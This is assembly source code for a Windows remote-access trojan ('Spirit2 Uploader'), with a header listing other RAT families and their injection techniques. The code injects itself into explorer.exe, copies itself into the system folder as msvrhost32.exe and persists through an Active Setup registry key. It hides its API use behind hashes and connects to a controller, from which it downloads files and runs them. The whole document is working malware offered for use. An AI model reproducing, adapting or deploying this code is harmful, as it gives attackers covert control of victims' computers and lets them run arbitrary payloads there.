;===============================================; Spirit2.Uploader Coder:Anskya; Email: Anskya@Gmail.com;; Spirit2.Uploader.code:100%(Server)-------code inject; Spirit3.b1.Uploader.code:100%(Server)----up; Spirit3.b2.Uploader.code:100%(Server)----up; Spirit4.Uploader.b1.code:100%(Server)----up; C-One 1.0.0.0.code:100%(Server----shit!)-code inject(no elirt); Bifrost.1.102.code:100%(Server)----------dll (memory pe loader) inject(use elirt)+plugin memory loader; Poison Ivy 2.0.0-2.14:100%(Server)-------code inject(no use elict)-code plugin; tequila bandita 1.3b2.code:100%(Server)--dll Memory Inject; Nuclear Seed 1.1.code:100%(Server+Client)----process hjeck;; Bifrost.1.21.code:30%(Server)------------dll (memory pe loader) inject(use elirt); Flux.1.01.code:70%(Server)---------------code inject(use elirt)-code plugin; Poison Ivy 2.20-2.30.code:10%(Server)----code inject(no use elict)-code plugin;; Thank:drocon,coban2k,iciko,ksv,Gargamel,shapeless,Caecigenus,stm; ; 完全原版逆向...编译器:Nasm 0.39.38 or Yasm 0.61; nasmw -fbin Spirit2a.asm -o Spirit2a.exe;===============================================[BITS 32]%define CODE_BASE 1000h%define DATA_BASE CODE_BASE %define RVADIFF 1000h-200h%define imagebase 00400000h%define reloc RVADIFF+imagebase%define MAX_PATH 260MZ_Header:.magic dw "MZ".cblp dw 0.cp dw "IC".crlc dw "IK".cparhdr dw "O".minalloc dw 0;.cblp dw "[C";.cp dw "]A";.crlc dw "ns";.cparhdr dw "ky";.minalloc dw "a"PE_Header:.Signature dd "PE".Machine dw 14Ch.NumberOfSections dw 1IAT_User32:.TimeDateStamp dd 0.PointerToSymbolTable dd 0.NumberOfSymbols dd 0.SizeOfOptionalHeader dw 0E0h.Characteristics dw 103hOptional_Header:.Magic dw 10Bh .MajorLinkerVersion db 0.MinorLinkerVersion db 0.SizeOfCode dd CODE_BASE.SizeOfInitializedData dd 0.SizeOfUninitialzedData dd 0.AddressOfEntryPoint dd code+RVADIFF.BaseOfCode dd 1000h;.BaseOfData dd DATA_BASE.lfanew dd 0Ch;align 16, DB 0 .ImageBase dd imagebase.SectionAlignment dd 1000h .FileAlignment dd 200h.MajorOperSystemVersion dw 4h.MinorOperSystemVersion dw 0h.MajorImageVersion dw 0h.MinorImageVersion dw 0h.MajorSubsystemVersion dw 4.MinorSubsystemVersion dw 0.Reserved1 dd 0h.SizeOfImage dd 2000h.SizeOfHeaders dd import.CheckSum dd 0h.Subsystem dw 2.DllCharacteristics dw 0h.SizeOfStackReserve1 dd 100000h.SizeOfStackCommit1 dd 2000h.SizeOfStackReserve2 dd 100000h.SizeOfStackCommit2 dd 1000h.LoaderFlags dd 0h.NumberOfRvaAndSizes dd 10hData_Directories:.Export times 2 dd 0h.Import dd import+RVADIFF, import_end-import.Resource times 2 dd 0.Exception times 2 dd 0h.Security times 2 dd 0h.Relocation times 2 dd 0h.Debug times 2 dd 0h.Architecture times 2 dd 0h.GlobalPtr times 2 dd 0h.TLS times 2 dd 0h.LoadConfig times 2 dd 0h.BoundImport times 2 dd 0h.IAT times 2 dd 0h.DelayImport times 2 dd 0h.ComDescriptor times 2 dd 0h.Reserved times 2 dd 0h;PE节----至少要有一个PE节sections:.SectionName db "spirit2",0.VirtualSize dd 1000h.VirtualAddress dd 1000h.SizeOfRawData dd code_end-import.PointerToRawData dd import.PointerToRelocations dd 0h.PointerToLinenumbers dd 0h.NumberOfRelocations dw 0h.NumberOfLinenumbers dw 0h.Characteristics dd 0E00000D0h;============================================================================================; 循环启动自身.查找ExplorerFind_Process: push 11h pop ecx@loop_push1: push edi loop @loop_push1 push esp push esp push 7 pop ecx@loop_push2: push edi loop @loop_push2 lea eax, [reloc + __GetCurrentPath] push eax call [reloc + __CreateProcessA] push 11h pop ecx@loop_pop: pop eax loop @loop_pop popad retn ; Win9x插入函数Inject_Win9x: push 40h push 08003000h push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2) push edi call [reloc + __VirtualAlloc] ; Write Memory push 8 push edi push eax push edi push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH) lea edx, [reloc + __RemoteCodeStart] push edx push eax push esi call [reloc + __WriteProcessMemory] ; CreateRemoteThread For Win9x call [reloc + __GetCurrentProcessId] xor eax, [fs:030h] xor ebx, eax mov esi, [reloc + __DebugActiveProcess]; 搜索CreateRemoteThread9x@search_crt9x: inc esi cmp dword [esi], 0E857FFFFh jnz @search_crt9x lodsd lodsd add eax, esi push -1000h push ebx call eax; 搜索OpenThread9x push edi push eax mov esi, [reloc + __OpenProcess]@search_opt9x: inc esi cmp dword [esi], 0E832FF50h jnz @search_opt9x lodsd lodsd add eax, esi push ebx call eax popad retndll002 db "USER32",0__ExplorerWindow db 'shell_traywnd',0align 200h, DB 0import dd 0 dd 0 dd -1 dd dll001+RVADIFF dd api001+RVADIFFtimes 5 dd 0 ;NULL DLL ENTRY dll001 db "KERNEL32.DLL",0;kernel32 apisapi001 dd api101+RVADIFF dd 0 api101 dw 0 db "ExitProcess",0 import_end:code: pushad lea ebx, [reloc + __LoadLibraryA] call GetKernel32 lea eax, [imagebase + dll002] push eax call [reloc + __LoadLibraryA] call GetFunctions xor edi, edi ; 获取自身路径 push MAX_PATH lea eax, [reloc + __GetCurrentPath] push eax push edi call [reloc + __GetModuleFileNameA] push 1024 call [reloc + __Sleep] ;Debug ;call RemoteCode ; 查找Explorer.exe窗口 push edi lea eax, [imagebase + __ExplorerWindow] push eax call [reloc + __FindWindowA] test eax, eax jnz @Inject_Process ; 启动自身,再次查找Exlorer窗口 lea eax, [imagebase + Find_Process] jmp eax; 注入代码To 远程进程(Explorer)@Inject_Process: push eax push esp push eax call [reloc + __GetWindowThreadProcessId] pop eax xchg eax, ebx push ebx push edi push 01F0FFFh call [reloc + __OpenProcess] xchg eax, esi ; 判断是否为Win9x call [reloc + __GetVersion] cmp eax, 080000000h jb @Inject_WinNT ; 执行Win9x插入 lea eax, [imagebase + Inject_Win9x] jmp eax @Inject_WinNT: push 40h push 3000h push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2) push edi push esi call [reloc + __VirtualAllocEx] push eax push esp push edi push edi push eax push edi push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH) lea ebx, [reloc + __RemoteCodeStart] push ebx push eax push esi call [reloc + __WriteProcessMemory] push edi push edi push esi call [reloc + __CreateRemoteThread] pop eax popad retn;=============================================; RemoteCode__RemoteCodeStart:RemoteCode: pushad call @Start@Start: pop ebx add ebx, (__LoadLibraryA - @Start) ; Load WS2_32 push '32' push 'ws2_' push esp call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA call GetFunctions ; Load Advapi32 push 0 push 'pi32' push 'adva' push esp call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA call GetFunctions push 5 pop ecx@@Loop_Pop: pop eax loop @@Loop_Pop; 安装文件 ; 获取安装目录 push MAX_PATH lea edi, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH] push edi call [ebx + (__GetSystemDirectoryA - __LoadLibraryA)] push edi add edi, eax lea esi, [ebx + (__SetupFileName - __LoadLibraryA)] ; 连接文件名 push 15 pop ecx rep movsb pop edi ; 删除已经存在的安装文件; push edi; call [ebx + (__DeleteFileA - __LoadLibraryA)]; ; Copy File push 0 push edi lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA)] push eax call [ebx + (__CopyFileA - __LoadLibraryA)] ; 填写注册表 ; 打开键值 push esi lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000002h call [ebx + (__RegCreateKeyA - __LoadLibraryA)] ; ; 填写键值 push 0b4h push edi push 1 push 0 lea eax, [ebx + (__ActiveSetup - __LoadLibraryA)] push eax push dword [esi] call [ebx + (__RegSetValueExA - __LoadLibraryA)] ; 关闭句柄 push dword [esi] call [ebx + (__RegCloseKey - __LoadLibraryA)]; 创建Socket连接 ;WSAStartup sub esp, 0800h mov edi, esp push edi push 1 call [ebx + (__WSAStartup - __LoadLibraryA)]@Loop_Online: ;closesocket push ebp call [ebx + (__closesocket - __LoadLibraryA)] ;socket push 6 push 1 push 2 call [ebx + (__socket - __LoadLibraryA)] ; 删除注册表 xchg eax, ebp lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000001h call [ebx + (__RegDeleteKeyA - __LoadLibraryA)]@Loop_connect: ;Sleep push 0800h call [ebx + (__Sleep - __LoadLibraryA)]; 终于可以连接了 lea eax, [ebx + (__MasterAddress - __LoadLibraryA)] push eax call [ebx + (__gethostbyname - __LoadLibraryA)] test eax, eax je @Loop_connect ; 压入端口开始连接 mov eax, dword [eax + 0ch] mov eax, dword [eax] push dword [eax] push 0FE120002h ;端口值---使用htons转换后的数值--写生成器时注意 pop dword [edi] pop dword [edi + 4] ;connect push 010h push edi push ebp call [ebx + (__connect - __LoadLibraryA)] jnz @Loop_Online push 0 ;GetComputerNameA push 010h push esp push edi call [ebx + (__GetComputerNameA - __LoadLibraryA)] jmp short @Send_OnlineInfo ; 循环接受数据包@Recv_Buffer: push 0 push 0800h push edi push ebp call [ebx + (__recv - __LoadLibraryA)] inc eax je @Loop_Online dec eax je @Loop_Online mov dh, byte [edi] inc edi call @Create_File dec edi ; 数据发送函数@Send_Buffer: push 0 push 2@Send_OnlineInfo: push edi push ebp call [ebx + (__send - __LoadLibraryA)]@Send_Loop: jmp short @Recv_Buffer ; 解析接受到的命令----看表头注明函数功能@Parse_Cmd:@Parse_Done: mov byte [edi], 78h retn @Create_File: dec dh jnz @Wirte_File xor ecx, ecx push ecx push ecx push 2 push ecx push ecx push 040000000h push edi call [ebx + (__CreateFileA - __LoadLibraryA)] inc eax je @Parse_Done dec eax xchg eax, esi retn@Wirte_File: dec dh jnz @Close_File dec eax push 0 push ecx push eax push edi push esi call [ebx + (__WriteFile - __LoadLibraryA)] test eax, eax je @Parse_Done retn@Close_File: dec dh jnz @Parse_UnInstall push esi call [ebx + (__CloseHandle - __LoadLibraryA)]@Execute_File: push 0Ah push edi call [ebx + (__WinExec - __LoadLibraryA)] cmp eax, 31 jns @Parse_Done retn@Parse_UnInstall: dec dh jnz @Close_Socket ; 删除注册表 lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000002h call [ebx + (__RegDeleteKeyA - __LoadLibraryA)] ; 删除安装文件 lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH] push eax call [ebx + (__DeleteFileA - __LoadLibraryA)] jmp @Close_SocketProc@Close_Socket: dec dh jnz @Parse_Ping@Close_SocketProc: push ebp call [ebx + (__closesocket - __LoadLibraryA)] pop eax ; exit@Exit_Loop: add esp, 0800h popad retn@Parse_Ping: dec dh jnz @Parse_Is9x mov byte [edi], 32h ret @Parse_Is9x: dec dh jnz @Parse_Exit call [ebx + (__GetVersion - __LoadLibraryA)] cmp eax, 080000000h jnb @Parse_Exit inc byte [edi] @Parse_Exit: retn ;============================================= ; get kernel32 baseGetKernel32: mov eax, [fs:30h] test eax, eax js @@os_9x @@os_nt: mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] jmp short @@finished @@os_9x: mov eax, [eax+034h] mov eax, [eax+0b8h] @@finished: ;retn; HashGetProcAddress thank coban2kGetFunctions: xchg eax, ebp mov eax, dword [ebp+03Ch] ; PE mov eax, dword [ebp+eax+078h] ; Export Table RVA lea esi, [ebp+eax+018h] ; Export Table VA+18h lodsd xchg eax, ecx ; NumberOfNames lodsd ; AddressOfFunctions push eax lodsd ; AddressOfNames add eax, ebp xchg eax, edx lodsd ; AddressOfNameOrdinals add eax, ebp push eax xchg esi, edx @next_func: lodsd add eax, ebp xor edx, edx @calc_hash: rol edx, 3 xor dl, byte [eax] inc eax cmp byte [eax], 0 jnz @calc_hash mov edi, ebx @scan_dw_funcs: cmp dword [edi], edx jnz @Skip_function mov eax, dword [esp] movzx eax, word [eax] shl eax, 2 add eax, dword [esp+4] mov eax, dword [eax+ebp] add eax, ebp stosd@Skip_function: scasd cmp dword [edi], 0 jnz @scan_dw_funcs add dword [esp], 2 loop @next_func pop eax pop eax ret ; =======API Hash Address__FunAddress: __LoadLibraryA dd 0A412FD89h __WinExec dd 0016EF74Bh __CreateProcessA dd 08EF94368h __Sleep dd 00005F218h __DeleteFileA dd 049462A7Bh __GetModuleFileNameA dd 060F43F1Bh __GetSystemDirectoryA dd 0B8E579C1h __CopyFileA dd 04F182A69h __CreateFileA dd 038C62A7Ah __WriteFile dd 058D8C545h __CloseHandle dd 0C0D6D616h __closesocket dd 0C0CBAF87h __connect dd 001BDA62Ch __gethostbyname dd 0208651E9h __send dd 00000FC54h __socket dd 0003FAF9Ch __recv dd 00000FE2Eh __WSAStartup dd 0E250EADAh __RegSetValueExA dd 09775A748h __RegCreateKeyA dd 0A718D938h __RegDeleteKeyA dd 08928D938h __RegCloseKey dd 0C6E06B86h __GetComputerNameA dd 0BA2070DFh __GetVersion dd 052ED5F54h __FindWindowA dd 0ABEEB02Bh __GetWindowThreadProcessId dd 0850BA256h __OpenProcess dd 029BF2CBBh __VirtualAllocEx dd 0C5B429FAh __WriteProcessMemory dd 0B04AD555h __CreateRemoteThread dd 04A5F66C2h __DebugActiveProcess dd 031978FE3h __GetCurrentProcessId dd 06D5EA21Eh __VirtualAlloc dd 0AB16D0AEh__ActiveSetup db 'StubPath',0;__MasterPort dd 0FE120002h__MasterAddress db '127.0.0.1',0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0__ActiveRegedir db 'SOFTWARE/Microsoft/Active Setup/Installed Components/'__ActiveRegHex db '{2A202488-F02D-11cf-64CD-1123AFEECF20}',0__SetupFileName db '/msvrhost32.exe',0__GetCurrentPath:__RemoteCodeEnd:%define RemoteCodeSize $ - RemoteCodecode_end:
